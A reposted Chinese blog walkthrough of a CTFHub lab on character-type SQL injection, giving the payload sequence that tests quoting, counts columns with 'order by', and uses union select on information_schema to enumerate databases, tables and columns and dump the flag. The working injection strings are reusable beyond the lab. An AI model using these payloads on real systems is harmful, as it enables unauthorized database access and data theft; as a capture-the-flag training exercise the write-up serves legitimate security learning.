数据库
首页 > 数据库> > CTFHUB—SQL注入—字符型注入

CTFHUB—SQL注入—字符型注入

作者:互联网

1.输入1‘测试,发现报错 输入' and 1=1测试,无法注入 输入1’and 1=1 --   注意:--后面有空格 输入'and 1=2 -- ,报错 因此判断,该url为字符型注入   2.判断列数,输入1' order by 3 -- ' 输入1' order by 2 -- ' 因此字段数是2   3.判断信息是第几列, ' union select 1,2 -- '   4.查询用户, ' union select 1,user() -- ',查询结果为:root用户   5.访问数据库, ' union select 1,version() -- ' 根据数据库版本得知,为MySQL的一个分支   6.查询当前数据库名称, ' union select 1,database() - 数据库名称为sqli   7.获取数据库名称, ' union select 1,group_concat(schema_name) from information_schema.schemata -- ' 查询得知,当前数据库为: information_schema,mysql,performance_schema,sqli   8.查询表名 ' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' -- ' 得知,sqli库中有两个表:flag、news   8.查询列名 ' union select table_name,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) -- '   9.查看指定数据库指定表的列的内容 ' union select 1,group_concat(flag) from sqli.flag -- '        

标签:sqli,CTFHUB,--,SQL,table,注入,union,select,schema
来源: https://www.cnblogs.com/chensicha/p/15525195.html